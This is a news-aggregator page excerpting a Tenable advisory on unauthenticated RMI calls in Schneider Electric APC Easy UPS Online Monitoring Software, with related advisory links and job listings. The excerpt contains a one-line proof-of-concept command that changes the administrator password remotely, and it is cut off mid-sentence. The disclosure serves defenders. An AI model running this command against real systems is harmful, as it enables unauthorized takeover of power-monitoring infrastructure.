all InfoSec news
Schneider Electric APC Easy UPS Online Monitoring Software Unauthenticated RMI Calls
April 21, 2023, 5:42 p.m. | Nick Miles
Tenable Research Advisories www.tenable.com
A vulnerability in Schneider Electric APC Easy UPS Online Monitoring Software V2.5-GS-01-22320 allows an unauthenticated remote attacker to issue RMI calls to certain remote Java objects in the application.
For example, the attacker can invoke cn.com.voltronicpower.rmiclass.SystemService.updateManagerPassword() to change the administrator password for the monitoring software.
POC:
- Install remote-method-guesser (https://github.com/qtc-de/remote-method-guesser/)
- Run: java -jar rmg-4.3.1-jar-with-dependencies.jar call 41009 '"482c811da5d5b4bc6d497ffa98491e38"' --signature 'String updateManagerPassword(String managerPassword)' --bound-name system
- This command attempts to …
apc application change electric issue java monitoring monitoring software schneider schneider electric software ups vulnerability
More from www.tenable.com / Tenable Research Advisories
Path Traversal Affecting Multiple CData Products
1 week, 3 days ago |
www.tenable.com
LG LED Assistant v2.1.65 Multiple Vulnerabilities
2 weeks, 4 days ago |
www.tenable.com
Showdownjs Denial of Service
1 month, 2 weeks ago |
www.tenable.com
SQL Injection in HTML5 Video Player WordPress Plugin
2 months, 2 weeks ago |
www.tenable.com
Jobs in InfoSec / Cybersecurity
Information Security Engineers
@ D. E. Shaw Research | New York City
Cybersecurity Architect III
@ JPMorgan Chase & Co. | Columbus, OH, United States
Senior DevSecOps Engineer
@ Marlabs | Chennai, IN
Consultant Cyber Sécurité H/F
@ Hifield | Lyon, France
Cyber Security Consultant (Remote, US)
@ Crosslake Technologies | Remote (US)
PE Hub- SAP GRC/ IAG Consultant
@ SAP | Bengaluru, IN, 560066